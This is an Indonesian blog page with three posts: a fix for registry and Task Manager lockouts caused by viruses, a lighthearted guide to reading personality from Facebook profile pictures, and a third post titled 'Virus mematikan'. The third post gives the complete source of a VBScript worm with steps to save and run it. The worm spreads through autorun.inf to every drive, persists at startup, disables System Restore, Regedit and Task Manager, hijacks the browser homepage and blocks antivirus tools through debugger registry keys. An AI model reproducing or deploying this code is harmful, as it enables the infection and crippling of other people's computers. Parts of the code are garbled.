08.15

Regedit dan Task manager ke disable

halo teman-teman kali ini sy akan membahas tentang taskmanager dan reg edit yang ke disable secara sndirinya mskpun kita tak pernah mengutak-ngatik komputer kita.

ada kemungkinan komputer km terkena virus loh, entah trojan,worm, dsb. Coba scan dahulu pakai anti virus/norton km nah apakah ada virusnya? kalau ada ya delete dan sembuhkan komputer anda. eitt jangan senang dlu masalah belum kelar. karena masih ke disable krn masih belum di aktifkan kembali. sekarng mari kita belajar cara mengaktifkannya.

I. Mengaktifkan Reg edit di menu run

1. buka command prompt, start > run > ketik “cmd” (tanpa tanda kutip) > enter.
2. ketikkan di command prompt sbb:
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools [semua harus sama dari spasi sampai huruf besar]
3. Kemudian akan muncul pertanyaan:
Delete the registry value DisableRegistryTools (Y/N)?
Jawablah dengan mengetikkan: Y
4. Setelah itu bukalah registry Editor melalui menu run dengan mengetik: regedit lalu klik OK. Sekarang Regedit bisa terbuka.


Dengan terbukanya Registry Editor berarti telah membuka jalan menuju perubahan setting berikutnya. Selanjutnya tinggal meng-enable-kan task manager dari registry editor. Berikut ini caranya:
1. Buka Regedit
2. Cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
3. Setelah ketemu. Pastikan nilai (value) untuk REG_DWORD DisableTaskMgr adalah 0 (zero) dengan cara mendouble clicknya ganti 1 dengan angka 0.
4. selesai [keduanya dapat diaktifkan kembali]

Semoga membantu

05.35

Mengetahui karakteristik seseorang dari profile picture FB

halo !! kali ini gw bwt entri baru lg.

kali ini gw bakal bahas tentang profile picture FB. Kita bs tau karakteristik orang dr PP tersebut.
langsung aja ya check it out :

1. Foto sendiri (close up, kaya KTP, atau dsb)
tipe orang ini biasanya pede atau percaya diri. soalnya dah ktauan dia brani nampilin wajah sndiri, yang sebetulnya tampang jg blm tentu ok, haha peace (just kidding kok). yang ptg gw salut dr percaya dirinya.

2. Foto bareng temen2 (kelompok, makan2, narsis bareng)
tipe ini yang biasanya pergaulan luas, hahah. dia mau nampilin teman2nya dan bs d bilang dia solid bgd sama kelompok atau sahabat2nya. Tp ati2 aja jangan pasang foto dugem bareng, hahah.

3. Foto sama pacar (beduaan lah masa bertiga :ngeri)
kalo ini jelas2 dia cinta bgd ama pacarnya, sampe2 d FB d upload dan d jadiin PP . Gw salut ama yg ini dia brani nampilin di depan umum, mskpun terkadang akan ada gosip krg enak.

4. Foto orang lain (terutama artis, org2 ganteng, org2 cantik, dsb)
kalo ini ketahuan tuh orang minder. hahaha. bktinya aja sampe masang foto artis2 adoh2 gile !! emang ganteng2 atau cantik2 sih, tp ada kalanya dia harus pede sm dirinya sndiri. masa pasang foto org lain d FB yg jelas2 bkn dia :capede.

5. Foto Lainnya (kartun,anime, wallpaper lainnya)
kalo ini bs d bilang tipe orang yg kreatif mau bagi2 gambar yg unik2 hehe. tp mnurut gw ga pas aja dia pake d PP FB. lbih baiknya d kumpulin terus d bkin album aja.

Dah ckup sgini dlu kl ada update an dr otak gw, nti gw kabarin lg deh x) heheh
thanks ya udah mau baca

04.44

Virus mematikan (simple, but very dangerous)

halo teman2 , gw nemu terobosan baru nih, tapi hati2 aja dalam penggunaanya. Jangan di coba di komputer sendiri ya , tar rusak gw g tanggung jawab :)


Ini sebenarnya bukan virus, tetapi sebuah data yg bs merusak seluruh document yg ada di komputer kalian. Check it Out deh...

1. Buka Notepad
2. isi kan kode ini
on error resume next

dim rekur,syspath,windowpath,desades,

longka,mf,isi,tf,F0nAb0530,nt,check,sd

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”

set longka = createobject(“Scripting.FileSystemObject”)

set mf = longka.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do

Set windowpath = longka.getspecialfolder(0)

Set syspath = longka.getspecialfolder(1)

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 32

set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)

tf.write rekur

tf.close

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 39

for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes =32

set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)

tf.write rekur

tf.close

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes = 39

set tf =longka.getfile(desades.path &”\autorun.inf”)

tf.attributes = 32

set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)

tf.write isi

tf.close

set tf = longka.getfile(desades.path &”\autorun.inf”)

tf.attributes=39

end if

next

set F0nAb0530 = createobject(“WScript.Shell”)

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\ActiveDesktop\NoChangingWallpa per”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Wi ndows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer

\NoLogOff”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\MRUList”, “a”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Ageia”, syspath & “\recycle.vbs”

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net/”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“

f check 1 then

Wscript.sleep 200000

end if

loop while check 1

set sd = createobject(“Wscript.shell”)

sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

3. Simpan dengan nama Mila.sys.vbs